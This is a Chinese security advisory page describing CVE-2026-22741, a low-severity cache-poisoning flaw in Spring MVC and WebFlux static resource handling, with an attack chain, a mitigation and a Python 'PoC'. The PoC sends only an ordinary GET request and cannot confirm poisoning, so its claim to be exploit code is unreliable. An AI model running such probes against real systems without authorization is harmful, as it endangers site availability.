CVE-2026-22741 CVSS 3.1 低危

CVE-2026-22741 Spring资源缓存投毒漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-22741

漏洞类型

缓存投毒

CVSS评分

3.1 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Spring Framework (Spring MVC, Spring WebFlux)

漏洞概述

Spring MVC与WebFlux应用在解析静态资源时存在缓存投毒漏洞。若应用配置了资源链支持并启用缓存及编码解析，且资源缓存处于空状态，攻击者可发送恶意请求污染缓存。这会导致应用提供错误编码的资源，破坏前端功能，从而引发拒绝服务风险。

技术细节

该漏洞发生于Spring MVC及WebFlux的静态资源处理模块。当开发者启用了`ResourceChain`资源链机制，并配置了缓存策略以及编码资源解析功能时，框架会缓存经过处理的静态资源以优化性能。漏洞的核心在于资源缓存为空的初始状态下，攻击者可以通过发送特制的HTTP请求，利用编码解析逻辑的缺陷，将错误的资源内容或编码类型写入缓存。一旦缓存被污染，后续所有合法用户访问该静态资源时，都将获得被篡改或损坏的数据（如错误的MIME类型），导致前端页面加载失败或功能异常，形成拒绝服务攻击。由于利用需要网络访问且无需认证，但攻击复杂度较高（需特定配置及时机），因此CVSS评分较低，但仍需引起重视。

攻击链分析

STEP 1

侦察

攻击者识别目标应用使用了Spring MVC或WebFlux，并探测静态资源端点。

STEP 2

条件验证

确认应用是否启用了资源链支持、缓存以及编码资源解析功能。

STEP 3

漏洞利用

在资源缓存为空的时机，发送特制的恶意请求，利用编码解析逻辑污染缓存。

STEP 4

造成影响

合法用户访问静态资源时获取到错误编码或损坏的数据，导致前端应用功能异常或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_cache_poisoning(target_url):
    """
    PoC for CVE-2026-22741: Spring Cache Poisoning
    This script sends a crafted request to attempt poisoning the static resource cache.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (PoC-Client)",
        "Accept-Encoding": "gzip, deflate, br"
    }
    
    # Attacker sends a request to a static resource when the cache is presumed empty
    # The specific encoding manipulation depends on the server configuration
    try:
        response = requests.get(target_url, headers=headers)
        if response.status_code == 200:
            print(f"[+] Request sent to {target_url}. Cache potentially poisoned if conditions are met.")
            print(f"[+] Response Content-Type: {response.headers.get('Content-Type')}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://vulnerable-app/static/example.js"
    exploit_cache_poisoning(target)

影响范围

Spring MVC

Spring WebFlux

防御指南

临时缓解措施

建议用户立即检查应用配置，若非业务必须，暂时关闭资源链缓存或编码解析功能，并关注官方发布的补丁更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表